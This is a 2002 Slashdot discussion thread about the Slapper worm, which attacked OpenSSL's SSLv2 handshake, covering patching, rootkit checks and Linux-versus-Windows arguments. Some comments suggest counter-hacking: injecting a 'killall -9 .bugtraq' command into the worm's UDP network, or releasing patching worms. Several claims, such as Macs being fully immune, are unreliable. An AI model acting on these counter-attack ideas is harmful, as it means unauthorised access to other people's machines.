I wonder why everyone uses null-terminated character arrays and dangerous things like strcat() or strcpy(). Maybe one should rather use a collection of 'trusted' functions that keep track of the current length and the maximum length of a character array; just in case one would like to call a product "secure".
Re:OpenSSL source
by
Anonymous Coward
·
· Score: 0
It's NOT a Linux Worm
by
sjvn
·
· Score: 2, Informative
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkrootkit version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at it, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger http://www.practical-tech.com/network/n09182002.htm
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
I believe the phase you're looking for is:
by
Anonymous Coward
·
· Score: 0
Worst episode ever!
Comic-Book Guy was here...
WRONG!!
by
Anonymous Coward
·
· Score: 0
Believe it or not, a goatsex link was modded Insightful. I shit you not.
Oh, I'm a Karma Whore and I'd Like to Say, ...
by
Anonymous Coward
·
· Score: 0
All together now: Defense In Depth.
by
CrystalFalcon
·
· Score: 2
While you're right in part about the importance of securing a system, you miss out completely on the importance of defense in depth.
The worst flaw of them all about any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me list some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style; "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! Every data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
What Causes These Flaws?
by
RAMMS+EIN
·
· Score: 2
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rather than the whole server, even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extent be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
-- Please correct me if I got my facts wrong.
Re:What Causes These Flaws?
by
octogen
·
· Score: 1
That's simply set noexec_user_stack=1 in /etc/system on Solaris/SPARC.
However, Intel processors are not capable of marking a stack segment read/write. The Write/Exec Flags share one bit in the descriptor, so you can't mark stack pages as nonexecutable if you want to have write permission to the same page.
LINUX IS BEING WINDOWZED!!!!
by
Anonymous Coward
·
· Score: 0
It started with kernel version after version fixing memory holes etc etc.
Then it continued with the Linux movement being torn apart by different versions of Linux.
Now there is enough investment in Linux that it is profitable for virus makers.
Unless the Linux community unites and fights all attempts to make money from Linux, building better tools, and not allowing Icaza-like attempts to profit...
The future... a Linux fully bugged like Windows. The trend is very clear: viruses will grow. Stop being such maniacs thinking Linux is perfect, and start making it better in reality.
Stop the trend!!!!!!!!!!!
Also check your /tmp directory
by
Mr.+Flibble
·
· Score: 2
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privileges and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
Information and live status about the worm
by
randomErr
·
· Score: 2
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them: "Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
-- You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
INVADE BRITAIN!!!!
Re:Excellent...
by
Anonymous Coward
·
· Score: 0
Australia, you're next! lol Do they even have an army? =) Just kidding I'm not even a USian.
why not fight virii with virii?
by
Narcocide
·
· Score: 1
anti-virus as a cure?
this may just be a naive question from a simple web programmer, but why can't someone just write an 'anti-virus?'... a virus that infects computers the same way the Slapper viruses do, but then patches the security breach instead of exploiting it further?
Re:why not fight virii with virii?
by
Garridan
·
· Score: 1
Why not? I think its a great idea. Get crackin', we don't have all day! These worms are spreading like wildfire!
Re:Finally - Linux can be utilized as a Desktop OS
by
Anonymous Coward
·
· Score: 0
Lern tu speek and wryt englsh u bunghole. The word IS VIRII! Viruses sounds like something that an ignorant New York hooker would say. Like "oohh... I slapted my asseses!"
Re:Keep your anti virus software up
by
Anonymous Coward
·
· Score: 0
Half wits at symantec haven't figured out that Linux is a completely different market than the Microsoft open door policy to exploit market.
Why are you making this much more complicated than necessary? I would not even think of downloading a fix for my SuSE system from any outside source. Sign up for the SuSE security mailing list and you will be notified, then disable the service or take appropriate measures until the SuSE security team releases the patch. Download the patch from SuSE and apply it.
its microsoft.
by
Anonymous Coward
·
· Score: 0
microsoft is writing the linux worms.
Re:Slapper: The threat that wasn't?
by
Anonymous Coward
·
· Score: 0
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
Yeah, well, the service that this worm exploits is ON. Which makes your point absolutely moot.
slapper kills two birds with one stone
by
mefus
·
· Score: 1
Well, slapper hasn't really hit the newsstands yet, but some sites are really trying to 1) Scare the hell^Wliberty out of people, and 2) give open source a black eye.
I found this at google:
New Linux virus creates peer-to-peer terror network... The Slapper worm virus writers had unfettered access to the source code of both OpenSSL and Apache, more effectively utilizing their administration features...
Slackware 8.1 has libsafe as one of the packages in the /extra directory.
-- ---
d'oh
no mac os9 or 0s8 server EVER exploited
by
Anonymous Coward
·
· Score: 0
no mac os9 or os8 server EVER exploited in entire BugTraq database history.
Based on 7 years or more of historical fact, macs are 100% immune running webservers on the net. There are many technical reasons why macs are the most secure OS.
Correct me if I'm wrong but....
by
Drakonite
·
· Score: 1
Is this a virus based upon a bug in an old version that has been patched and gotten quite a bit of publicity not too long ago?
--
Shoot Pixels, Not People!
Where have you guys been?
by
Anonymous Coward
·
· Score: 0
Where have you folks been? This has been around and in the news for well over a week. Those of us who were vulnerable and cared about security have long since updated OpenSSL and moved on.
"We don't do a new version to fix bugs." - Bill Gates "The new version - it's not there to fix bugs." - Bill Gates
-- Retranslated from Focus 43/1995, pp. 206-212
- this post brought to you by the Automated Last Post Generator...
... we're starting to catch up with Microsoft in the vital worm-propagation field, where they've been unmatched for years. :-)
Laugh, it's a joke
- sig? who is this sig of which you speak?
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
;)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
Why bother.
You think this is tied to the popularity increase of Linux in the userbase? The webservers have always been around...
;)
Seems like the gloves are coming off. Perhaps we need a sample of this worm to test its DNA and determine its origins.
"The worms, Slapper.B and Slapper.C, which exploits a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process has infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company. "
Time to grab a coffee.. I thought it said "thanks to Helsinki-based F-Secure Corp." :-)
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
The heat from below can burn your eyes out
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms? It looks like they've found Open Source's achilles heel
So what can we do about it? Maybe we should abandon the GPL (which allows anyone to contribute ticking timebomb patches) and use a better license, such as the Microsoft Shared Source license. That may be the only way to save linux!
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
It does not seem too bad though
You should put this on your resume when you apply at Microsoft...
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
"Of course, by the time you read this, the bug will have been patched. ;)"
This is the most significant benefit (to me at least). In fact, I think that to most people, the biggest benefit of open source is the rapid deployment of bug fixes, patches etc. rather than cheap or free software. Without open source, I'm afraid most of us would be stuck in a world of buggy software that only works when it feels like it.
Oh wait a minute... What? "Windows has encountered a problem..."
Anyway, the point is that I have never heard of MS, Oracle, or any of the other major software companies ever having a patch within hours much less days for anything.
http://www.cert.org/advisories/CA-2002-27.html
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the alley behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase its security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Why bother.
What should I look for in my apache logs to see if I'm being "hit" by it? Anyone have an example?
your friendly neighborhood AC
I guess not even open source solutions can cure lazy admin syndrome, eh?
When was it stated that it would?
So, did the bite hurt, ass?
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
sslv2-master/openssl-sslv2-master.c
http://cert.uni-stuttgart.de/advisories/openssl
It will connect to your HTTPS server and check it. Unfortunately, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
Linux can be utilized as a Desktop OS!
:(
I can do everything virtually in Linux what I can do in Windows.
There's only a little lacking in the field of capturing/encoding divx movies and graphical download managers, but I might be wrong there since I haven't bothered to look.
I also have to give a lecture on the slapper worm in a couple weeks and I haven't really started my presentation notes.
Wish me LUCK!
I find it somewhat odd that each advisory from an anti-virus vendor concerning the slapper worm advises to not only patch your software, but also keep your antivirus software current.
If the software is patched then antivirus software is irrelevant.
How big is the antivirus software market for linux?
Usually it takes at least half an hour to release a patch when a hole is discovered.
This time the patch was a month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I've been having trouble connecting to http://www.apache.org this morning. Maybe that's why ?
Oh wait, it's on a +5 /. post..
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
Sheesh, evil *and* a jerk. -- Jade
being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just cant take the abuse anymore.
slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 Windows hosts are still estimated as CodeRed infected, one year after the event.
According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, prove two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
Assorted stuff I do sometimes: Lemuria.org
Yammer yammer yammer!
No wait! "Developers! Developers! Developers! Developers!" -- Steve "Monkey Boy" Ballmer
Why the F___ is this being called a LINUX worm, when in fact it is an SSL worm?
Lets just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
http://www.lwn.net/Articles/10026/
Thanks.
rooooar
No kidding! I was so glad to see that we get virii and worms, too. I mean, seriously. I was getting so tired of hearing my co-workers say "Hey, I've got the latest variation of the KleZ virus." "Oh yeah? Code red is still eating me alive!" As I just meekly stir my Dr. Pepper and saunter off...
Not anymore! I TOO am infected! HAHAHA!!! We can at last fully compete with the desktop market!
Oh wait... I guess it's a webserver virus, huh? Crap. Better luck next time, I guess.
Just read this:
http://www.microsoft.com/presspass/exec/charney/07-24testimony.asp
-SexyKellyOsbourne
Got to love the buffer overflow... i will just laugh quietly while you patch your machines as you have done to me many times with iis...
Rather than simply having deleted the page, I wonder if it would have been possible to replace this source code with something else that acted as an "antibody"?
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is so used to getting only one or two attacks a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vulnerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
You knew the job was dangerous when you took it.
I think that Linux provides the sysadmins with a false sense of security. Most sysadmins think that because they are running Linux, they can't be infected with any viruses and worms. The result of this is that many of these administrators never bother to check about new threats, because they haven't seen anything like this for a while. Normally Linux administrators are more tech savvy than Windows administrators, but as the Linux GUI improves, one will see a proliferation of not so tech savvy administrators in the Linux market as well. So be prepared for increasing amounts of damage which such worms can cause.
On the other hand, the administrators of Windows machines, because they are facing a new worm every second day, try to stay up to date with the latest news and patches. Most of them have automatic update wizards running on their machines which download new patches instantly.
In fact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system administrator is too lazy to check a news site, he will still come to know about the threat.
And because it will be running on linux, it will do what its supposed to do, not "God knows What and Gates knows what" as is the case with windows update wizard.
What's under yellowstone?
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
May we never see th
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
If open source has tons of programmers around the world reviewing every piece of code, how is there a security vulnerability? Could it be that open and proprietary software SHARE some of the same problems? Nah. Couldn't be.
/sarcasm
IRIX has this nasty tendency to have lots of unimportant stuff running... /Mikael
Greylisting is to SMTP as NAT is to IPv4
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reiterate their dogmatic belief: Virus := Bad
OpenSource := Good
Microsoft := Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
When OpenSSL design flaw opened a path for exploits it was classified as "Linux".
What gives?
And the patch fixes the hole that all variants use.
May we never see th
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
May we never see th
I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse than having to reformat and reinstall the entire OS because you are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are careful about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
>I find it somewhat odd that each advisory from an anti-virus vendor
>concerning the slapper worm advises to not only patch your software,
>but also keep your antivirus software current.
>If the software is patched then antivirus software is irrelevant.
>How big is the antivirus software market for linux?
There isn't one and there still won't be one after this, because you don't need antivirus software to either detect or fix the problem. That's the big problem the anti-virus outfits are running into. The open source movement still doesn't need them.
Upgrading OpenSSL isn't the only necessary step. I patched mine, and forgot to restart Apache -- and got hit by the "A" variant last week. Picked it up immediately, and removed it. It's pretty harmless as these things go, but it dawned on me when I cleaned it up and did a tripwire check to make sure nothing had changed that I hadn't restarted Apache when I upgraded the libraries.
> virii
The word is VIRUSES !!!!
Not to troll, but doesn't anybody see a big big problem?
Okay, so somebody out there is coding Worms especially for Linux. No problem, that was to be expected.
But the problem is this, the patch could be made by anyone, right? So this patch could also be infected or make things worse...
I myself NEVER check code on Linux, just because I can't code and don't want to... So I would download the patch and install it, but how can I be sure the patch isn't another Worm or Trojan?
I could wait for an "official" release by Suse, but hey... I want to patch this [fill new worm name here] worm's threat as soon as possible, mainly BECAUSE I don't have a clue how it works...
Please don't reply with "Get A Clue" because that's for me (and I guess for a lot of people) no option...
From: Ron DuFresne [mailto:dufresne@winternet.com]
Sent: Tuesday, September 24, 2002 9:54 AM
To: firewalls@isc.org
Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get
on the ball and fully patch-up;
September 23 VNUNET.COM.
A suspect has been arrested on suspicion of authoring the Slapper worm.
But although the threat of the worm seems to have been short-lived, a new
variant is already set to take up where its predecessor left off. Although
the ISC's 'most attacked ports' chart no longer features Slapper in its
Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has
several subtle differences, but is for the most part an updated version of
its predecessor. Both worms attempt to exploit a known vulnerability in
the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants
also carry the same payload, a password-protected backdoor and denial of
service (DoS) capabilities. ISS's Morgan said that with the new variant on
the loose his company had calculated that about 10,000 servers were
probably now infected, and that the network was probably going to be used
for DoS attacks. He added that it was unlikely the original author created
the second worm. "It was significant that source code for the original
Slapper was distributed within the computer underground immediately after
the worm was detected in the wild," he said. Source:
http://www.vnunet.com/News/1135274
--
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
It's called "installed user base".
A linguistic note for Americans and other aliens....
"Slapper" is an EnglishEnglish term for a woman with an easily exploited hole....
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at the incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note especially the attacks. In less than 12 hours after Nimda's appearance I had more than 340000 Nimda "visits" on the network I supervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
--- Nothing clever here: move along now...
Why are there still such kind of errors!? Aren't there safer ways to work with buffers? Can't we people just enable runtime checks for these things?!
sheesh!
Looking for people to chat about multicopters, coding, music. skype: gtsiros
Does anyone have the source to it?
:) noticed that one could inject 'killall -9 .bugtraq' into the infection network, to shut it down.
The original had an 'execute local command' option, and some wise bugtraq reader (no, it wasn't me
Or failing that, one might write a wee proggie to sit on UDP port 2002, and reply to any connections with this command. One would, of course, run this on an isolated machine...
Wouldn't moving the /usr/bin/gcc command to a backup file stop these worms from spreading? Move it back only temporarily when you need to "make" something.
Meh.
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
retrorocket.o not found, launch anyway?
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily uses or commences the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories).
Is there something that will check a system for _vulnerability_ as opposed to just if it's infected?
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Perhaps I misread this idea tho?
creation science book
Sysadmins just put an apt-get update in their list of cron jobs. I'm sure it'll save them time by not having to constantly check for security holes, etc online.
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
I don't speak French.
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
It would be trivially easy to write a function to randomly assign buffersize based on parameters (say, min max and optimal size), and even change its size periodically at runtime. That would eliminate this entire class of attack.
Correct me if I'm wrong but these Slapper viruses only infect ix86 Linux distributions. Since it is a buffer overflow attack the code that overflows must be platform specific. In which case my PowerPC machines are safe from this round of viruses as the virus can only infect ix86 machines.
"Windows Admin with Thumb Up Butt" == "Linux Admin with Thumb Up Butt" == "No Admin At All"
Any word on IDS signatures for snort, etc. ?
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Thank you extremely for putting this up. Seems my server is safe (and now patched), but it's good to know so that I don't have to worry. Also, it saddens me greatly to see that some buttmunch posted the full link, whether to be a jerk or just out of sheer ignorance I don't know.
Here's a copy: triple-w.phormix.com/files/public/chkrootkit.tar.gz (replace triple-w. with www.)
"Worms" on the internet? will a "fish" take care of it? - phorm
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
And if there were no compiler, then all my ./configure, make && make install scripts would go to hell, seeing as though they all recompile themselves. A lot of useful patches often recompile themselves too.
Renaming your compiler binary instead of deleting it would probably be more useful, that way one could at least compile wanted code when needed.
gcc evil-worm-patch. bash: gcc: command not found. ah crap - phorm
when i was admin, i patched the machines as often as i could
:)
cause it was fun.
do the same and you'll be safe
I'd tell you the chances of this story being a dupe, but you wouldn't like it.
I was infected a week ago. The next day I was warned by F-secure.
I removed the files. Commented out the open_ssl module and restarted Apache.
I had done an upgrade of OpenSSL in August, or so I thought. Problem: Red Hat backported the patch to the same version number as installed with 7.2. I guess that I applied the wrong rpms.
As for gcc on the server - the server isn't in the same country as I am. I have never seen it in the flesh. I have a standard Red Hat 7.2 on the machine because I need to compile stuff from time to time.
realkiwi
Open SSL Security Advisory from July
When I first heard about this "virus", I must admit my sphincter clenched up a bit, being responsible for more than a few Open SSL ecommerce servers (and just having started a week off from work to boot). But after a looking into it for about 10 seconds, I realized I was ok since I upgraded in July.
Am I missing something here or are the people that did get affected by this people who simply ignored the July warning?
For those of you who don't recall, the Pinto was a car with a minor flaw - If you bumped into its ass it tended to explode in a fireball.
Ford knew of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
/~mikeg
I mean, according to the FSF FAQ, shouldn't this be called a GNU/Linux worm?
viruses aren't for windows anymore???
The figures being bandied about here are as follows: Code red infected 400000 systems. Slapper infected probably 15000 systems. Considering that Microsoft IIS and Apache/ssl have comparable market share, I'd say the actual, practical, measured difference in vulnerability levels between Microsoft and Apache administrators is substantial.
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion. :) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
"I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
This has been the biggest news in the security
community for weeks. You guys are clueless.
And you keep ignoring an equally serious exploit
involving trojanned configure scripts. Apparently
because you reported on it in July you are willing
to let your readers suffer ownership to avoid
getting a bunch of lamer posts saying "you already
reported this."
PATHETIC, Pathetic, pathetic...
I don't know who's doing the counting, but my servers got slammed last week with probes from this damn worm. There are a hell of a lot more than 11,000 machines infected. The traffic I'm seeing from this worm is significantly higher than I saw from Code Red.
$ cd OpenSSL
$ (for obj in $(find . -name *.c); do grep strcpy $obj; done) | wc
37 72 1197
$ (for obj in $(find . -name *.c); do grep strcat $obj; done) | wc
47 57 1125
$ (for obj in $(find . -name *.c); do grep goto $obj; done) | wc
2840 10161 71668
$
Most of the "goto"s are something like "goto end" or "goto bad". However, things like "goto start" look as if they could have been done using for(;;) { } or do { } while(..) or something similar instead.
I wonder why everyone uses null-terminated character arrays and dangerous things like strcat() or strcpy(). Maybe one should rather use a collection of 'trusted' functions that keep track of the current length and the maximum length of a character array; just for the case one would like to call a product "secure".
Practically Impossible Not To Oxplode
